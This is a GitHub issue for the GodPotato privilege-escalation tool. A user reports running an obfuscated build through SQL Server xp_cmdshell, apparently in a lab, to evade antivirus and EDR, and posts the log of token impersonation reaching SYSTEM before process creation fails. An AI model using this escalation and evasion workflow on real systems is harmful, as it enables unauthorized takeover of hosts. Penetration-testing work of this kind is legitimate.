Skip to content

Win32Error:2 #15

@Nednassim

Description

@Nednassim

Upon obfuscating and running GodPotato.exe .Net4 version to evade AV/EDR detection, it runs, but I get this error :

SQL (ECORP\j.martinez dbo@master)> EXEC xp_cmdshell "C:\programdata\gp.exe"
output

[] CombaseModule: 0x140731965243392
[
] DispatchTable: 0x140731967830344
[] UseProtseqFunction: 0x140731967124528
[
] UseProtseqFunctionParamCount: 6
[] HookRPC
[
] Start PipeServer
[] Trigger RPCSS
[
] CreateNamedPipe \.\pipe\375578ed-3576-461c-b44d-e94f859793a6\pipe\epmapper
[] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[
] DCOM obj IPID: 00009002-0a50-ffff-3f00-1872bc1aefef
[] DCOM obj OXID: 0x85da647e8e93bdf0
[
] DCOM obj OID: 0x4315a5759a0a0e9d
[] DCOM obj Flags: 0x281
[
] DCOM obj PublicRefs: 0x0
[] Marshal Object bytes len: 100
[
] UnMarshal Object
[] Pipe Connected!
[
] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[] CurrentsImpersonationLevel: Impersonation
[
] Start Search System Token
[] PID : 872 Token:0x772 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[
] Find System Token : True
[] UnmarshalObject: 0x80070776
[
] CurrentUser: NT AUTHORITY\SYSTEM
[!] Cannot create process Win32Error:2
NULL

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions